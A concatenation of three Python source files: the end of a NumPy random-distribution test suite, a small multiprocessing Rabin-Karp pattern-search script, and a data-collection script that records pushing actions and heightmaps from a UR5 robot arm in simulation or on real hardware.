vonmises = np.random.vonmises
desired = np.array([2.9883443664201312,
-2.7064099483995943,
-1.8672476700665914])
self.setSeed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.setSeed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = np.random.pareto
desired = np.array([1.1405622680198362,
1.1465519762044529,
1.0389564467453547])
self.setSeed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = np.random.weibull
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = np.random.power
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = np.random.laplace
desired = np.array([0.067921356028507157,
0.070715642226971326,
0.019290950698972624])
self.setSeed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.setSeed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = np.random.gumbel
desired = np.array([0.2730318639556768,
0.26936705726291116,
0.33906220393037939])
self.setSeed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.setSeed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = np.random.logistic
desired = np.array([0.13152135837586171,
0.13675915696285773,
0.038216792802833396])
self.setSeed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.setSeed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = np.random.lognormal
desired = np.array([9.1422086044848427,
8.4013952870126261,
6.3073234116578671])
self.setSeed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
self.setSeed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = np.random.rayleigh
desired = np.array([1.2337491937897689,
1.2360119924878694,
1.1936818095781789])
self.setSeed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = np.random.wald
desired = np.array([0.11873681120271318,
0.12450084820795027,
0.9096122728408238])
self.setSeed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
self.setSeed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = np.random.triangular
desired = np.array([2.03339048710429,
2.0347400359389356,
2.0095991069536208])
self.setSeed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.setSeed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.setSeed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = np.random.binomial
desired = np.array([1, 1, 1])
self.setSeed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.setSeed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = np.random.negative_binomial
desired = np.array([1, 0, 1])
self.setSeed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.setSeed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
|
measure2.py
|
from rabinkarp_parallel import RabinKarpParallel
from multiprocessing import Process, Queue, Lock
from doc_handle import DocumentHandle
import sys
def main(lock):
processes = []
R = Queue()
# number of threads
k = 3
prk = RabinKarpParallel()
doc = DocumentHandle()
# open name and content original document
textname, txt = doc.get_txt()
# print txt
# open pattern name
filenames = doc.get_pat()
d = int((len(txt) - 5 + 1) / k + 1)
for i in range(1, len(filenames)):
# open pattern one by one through the loop
patname = filenames[i].replace('\n', '')
with open (patname, 'r') as pattern:
pattern = pattern.read().replace('\n', ' ').replace('\t', ' ')
pattern = pattern.split()
# pattern = doc.wordshingling(pattern)
# print pattern
# print patname
# print pattern
for j in range(k - 1):
p = Process(target=all_position, args=(lock, int(j * d), int((j+1) * d) + 5 - 1, pattern, txt, i, R,))
processes.append(p)
p.start()
p = Process(target=all_position, args=(lock, int(d * (k-1)), len(txt) + 5 - 1, pattern, txt, i, R,))
processes.append(p)
p.start()
def all_position(l, x, y, pat, txt, i, R):
l.acquire()
print pat
l.release()
if __name__ == '__main__':
lock = Lock()
main(lock)
|
collect_data.py
|
from robot import Robot
import utils
import os
import time
import threading
import datetime
import argparse
import numpy as np
import cv2
from constants import workspace_limits, heightmap_resolution, DEPTH_MIN
class PushDataCollector():
def __init__(self, args):
# Create directory to save data
timestamp = time.time()
timestamp_value = datetime.datetime.fromtimestamp(timestamp)
self.continue_logging = args.continue_logging
if self.continue_logging:
self.base_directory = os.path.abspath(args.logging_directory)
print('Pre-loading data logging session: %s' % (self.base_directory))
else:
self.base_directory = os.path.join(os.path.abspath('logs_push'), timestamp_value.strftime('%Y-%m-%d.%H:%M:%S'))
print('Creating data logging session: %s' % (self.base_directory))
self.color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'color-heightmaps')
self.depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'depth-heightmaps')
# self.prev_color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_color_heightmaps')
# self.prev_depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_depth_heightmaps')
# self.prev_pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_pose')
# self.next_color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_color_heightmaps')
# self.next_depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_depth_heightmaps')
# self.next_pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_pose')
self.action_directory = os.path.join(self.base_directory, 'data', 'actions')
self.pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'poses')
if not os.path.exists(self.color_heightmaps_directory):
os.makedirs(self.color_heightmaps_directory)
if not os.path.exists(self.depth_heightmaps_directory):
os.makedirs(self.depth_heightmaps_directory)
# if not os.path.exists(self.prev_color_heightmaps_directory):
# os.makedirs(self.prev_color_heightmaps_directory)
# if not os.path.exists(self.prev_depth_heightmaps_directory):
# os.makedirs(self.prev_depth_heightmaps_directory)
# if not os.path.exists(self.prev_pose_heightmaps_directory):
# os.makedirs(self.prev_pose_heightmaps_directory)
# if not os.path.exists(self.next_color_heightmaps_directory):
# os.makedirs(self.next_color_heightmaps_directory)
# if not os.path.exists(self.next_depth_heightmaps_directory):
# os.makedirs(self.next_depth_heightmaps_directory)
# if not os.path.exists(self.next_pose_heightmaps_directory):
# os.makedirs(self.next_pose_heightmaps_directory)
if not os.path.exists(self.action_directory):
os.makedirs(self.action_directory)
if not os.path.exists(self.pose_heightmaps_directory):
os.makedirs(self.pose_heightmaps_directory)
self.iter = args.start_iter
self.start_iter = args.start_iter
self.end_iter = args.end_iter
self.loaded = False
self.saving_color_images = None
self.saving_depth_images = None
self.saving_actions = None
self.saving_poses = None
self.saving_iter = self.iter
def save_push_prediction_heightmaps(self, iteration, prev_color_heightmap, prev_depth_heightmap, next_color_heightmap, next_depth_heightmap):
color_heightmap = cv2.cvtColor(prev_color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.prev_color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(prev_depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.prev_depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
color_heightmap = cv2.cvtColor(next_color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.next_color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(next_depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.next_depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
def save_heightmaps(self, iteration, color_heightmap, depth_heightmap):
color_heightmap = cv2.cvtColor(color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
def save_action(self, iteration, pose):
np.savetxt(os.path.join(self.action_directory, '%07d.action.txt' % (iteration)), pose, fmt='%s')
def save_pose(self, iteration, pose):
np.savetxt(os.path.join(self.pose_heightmaps_directory, '%07d.pose.txt' % (iteration)), pose, fmt='%s')
def push_check(self, args):
"""
Script to check the correctness of collection process
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=False, test_preset_cases=False, test_preset_file='', collect_push=True)
print('\nStart', self.iter)
robot.check_sim()
robot.restart_sim()
robot.add_object_push()
start_x, start_y = input("Input action position: ").split()
start_x = float(start_x)
start_y = float(start_y)
for i in range(10):
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
poses = (prev_obj_positions[0][0], prev_obj_positions[0][1], prev_obj_orientations[0][0], prev_obj_orientations[0][1], prev_obj_orientations[0][2],
prev_obj_positions[1][0], prev_obj_positions[1][1], prev_obj_orientations[1][0], prev_obj_orientations[1][1], prev_obj_orientations[1][2])
print(prev_obj_positions[0], prev_obj_orientations[0])
print(prev_obj_positions[1], prev_obj_orientations[1])
# push 1 cm
action = [start_x + i * 0.01, start_y, 0.001]
push_success = robot.push(action, 0, workspace_limits)
assert push_success
input("press to continue")
self.save_heightmaps(self.iter * 100 + i, prev_color_heightmap, prev_valid_depth_heightmap)
self.save_action(self.iter * 100 + i, [action[:2]])
self.save_pose(self.iter * 100 + i, [poses])
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
poses = (prev_obj_positions[0][0], prev_obj_positions[0][1], prev_obj_orientations[0][0], prev_obj_orientations[0][1], prev_obj_orientations[0][2],
prev_obj_positions[1][0], prev_obj_positions[1][1], prev_obj_orientations[1][0], prev_obj_orientations[1][1], prev_obj_orientations[1][2])
print(prev_obj_positions[0], prev_obj_orientations[0])
print(prev_obj_positions[1], prev_obj_orientations[1])
self.save_heightmaps(self.iter * 100 + i + 1 , prev_color_heightmap, prev_valid_depth_heightmap)
self.save_pose(self.iter * 100 + i + 1, [poses])
def push_data_collect(self, args):
"""
Randomly dropped objects to the workspace, the robot makes a push from left to right, recording the info every 1 cm.
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
# -------------- Testing options --------------
is_testing = args.is_testing
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=is_testing, test_preset_cases=test_preset_cases, test_preset_file=test_preset_file, collect_push=True)
thread = threading.Thread(target=self.saving_thread, args=(robot,))
thread.start()
while self.iter < self.end_iter:
print('\nCollecting data iteration: %d' % (self.iter))
# Make sure simulation is still stable (if not, reset simulation)
if is_sim:
robot.check_sim()
robot.restart_sim()
bbox_heights = robot.add_object_push()
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
skip = False
for i in range(len(prev_obj_positions)):
if (prev_obj_positions[i][0] < workspace_limits[0][0] or prev_obj_positions[i][0] > workspace_limits[0][1] or
prev_obj_positions[i][1] < workspace_limits[1][0] or prev_obj_positions[i][1] > workspace_limits[1][1]):
print("Out of space, Skip")
skip = True
break
if prev_obj_positions[i][2] > bbox_heights[i]:
print("height is wrong Skip")
skip = True
break
if skip: continue
# Find target and push
depth_heightmap = np.copy(prev_valid_depth_heightmap)
depth_heightmap[depth_heightmap <= DEPTH_MIN] = 0
depth_heightmap[depth_heightmap > DEPTH_MIN] = 1
y_indices = np.argwhere(depth_heightmap == 1)[:, 0] # Find the y range
if len(y_indices) == 0:
print("find Skip")
continue
y_list = np.arange(y_indices.min(), y_indices.max() + 1)
if len(y_list) == 0:
print("min Skip")
continue
y_list = y_list[10:len(y_list)-10]
if len(y_list) == 0:
print("shrink Skip")
continue
y = np.random.choice(y_list)
x_indices = np.argwhere(depth_heightmap[y, :] == 1)[:, 0] # Find the x range
x_indices_up = np.argwhere(depth_heightmap[max(y-5, 0)] == 1)[:, 0] # Find the x range
x_indices_down = np.argwhere(depth_heightmap[min(y+5, 223)] == 1)[:, 0] # Find the x range
if len(x_indices) == 0:
print("Skip")
continue
x = x_indices.min()
if len(x_indices_up) != 0:
x = min(x, x_indices_up.min())
if len(x_indices_down) != 0:
x = min(x, x_indices_down.min())
x = x - 10
if x <= 0:
print("Skip")
continue
# safe_kernel = 16
# local_region = prev_valid_depth_heightmap[max(x - safe_kernel, 0):min(y + safe_kernel + 1, prev_valid_depth_heightmap.shape[0]), max(x - safe_kernel, 0):min(x + safe_kernel + 1, prev_valid_depth_heightmap.shape[1])]
# if local_region.size == 0:
# safe_z_position = workspace_limits[2][0]
# else:
# if np.max(local_region) < 0.03:
# safe_z_position = workspace_limits[2][0]
# else:
# safe_z_position = 0.025 + workspace_limits[2][0]
safe_z_position = workspace_limits[2][0]
_, color_images, depth_images, actions, poses = robot.push_with_stream([x * heightmap_resolution + workspace_limits[0][0], y * heightmap_resolution + workspace_limits[1][0], safe_z_position], 0, workspace_limits)
while self.loaded:
print('Wait for saving iteration:', self.saving_iter)
time.sleep(1)
self.saving_color_images = color_images
self.saving_depth_images = depth_images
self.saving_actions = actions
self.saving_poses = poses
self.saving_iter = self.iter
self.loaded = True
self.iter += 1
def push_data_collect_real(self, args):
"""
Becase sim to real is working, this part hasn't been completed, but the idea and process should be the same
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
# Directory containing 3D mesh files (.obj) of objects to be added to simulation
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = '172.19.97.157' # IP and port to robot arm as TCP client (UR5)
tcp_port = 30002
rtc_host_ip = '172.19.97.157' # IP and port to robot arm as real-time client (UR5)
rtc_port = 30003
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
heightmap_resolution = args.heightmap_resolution # Meters per pixel of heightmap
is_testing = args.is_testing
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=is_testing, test_preset_cases=test_preset_cases, test_preset_file=test_preset_file, collect_push=True)
thread = threading.Thread(target=self.saving_thread, args=(robot,))
thread.start()
while self.iter < self.end_iter:
print('\nCollecting data iteration: %d' % (self.iter))
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
# center
x = 40
y = 112
safe_z_position = workspace_limits[2][0] + 0.1
_, color_images, depth_images, actions, poses = robot.push_with_stream([x * heightmap_resolution + workspace_limits[0][0], y * heightmap_resolution + workspace_limits[1][0], safe_z_position], 0, workspace_limits)
while self.loaded:
print('Wait for saving iteration:', self.saving_iter)
time.sleep(1)
self.saving_color_images = color_images
self.saving_depth_images = depth_images
self.saving_actions = actions
self.saving_poses = poses
self.saving_iter = self.iter
self.loaded = True
self.iter += 1
def saving_thread(self, robot):
print('Saving started')
while True:
if self.loaded:
print('Saving iteration:', self.saving_iter)
for i in range(len(self.saving_color_images)):
color_img = self.saving_color_images[i]
depth_img = self.saving_depth_images[i]
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
next_color_heightmap, next_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
next_valid_depth_heightmap = next_depth_heightmap.copy()
next_valid_depth_heightmap[np.isnan(next_valid_depth_heightmap)] = 0
self.save_heightmaps(self.saving_iter * 100 + i, next_color_heightmap, next_valid_depth_heightmap)
self.save_action(self.saving_iter * 100 + i, [self.saving_actions[i]])
self.save_pose(self.saving_iter * 100 + i, [self.saving_poses[i]])
# print('Push', self.saving_actions[i])
# print('Pose', self.saving_poses[i])
print('Saved iteration:', self.saving_iter)
self.loaded = False
else:
time.sleep(1)
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='Collect data for push prediction')
# --------------- Setup options ---------------
parser.add_argument('--is_sim', dest='is_sim', action='store_true', default=False, help='run in simulation?')
parser.add_argument('--is_real', dest='is_real', action='store_true', default=False, help='run in simulation?')
parser.add_argument('--obj_mesh_dir', dest='obj_mesh_dir', action='store', default='objects/final-push', help='directory containing 3D mesh files (.obj) of objects to be added to simulation')
parser.add_argument('--num_obj', dest='num_obj', type=int, action='store', default=7, help='number of objects to add to simulation')
parser.add_argument('--tcp_host_ip', dest='tcp_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as TCP client (UR5)')
parser.add_argument('--tcp_port', dest='tcp_port', type=int, action='store', default=30002, help='port to robot arm as TCP client (UR5)')
parser.add_argument('--rtc_host_ip', dest='rtc_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as real-time client (UR5)')
parser.add_argument('--rtc_port', dest='rtc_port', type=int, action='store', default=30003, help='port to robot arm as real-time client (UR5)')
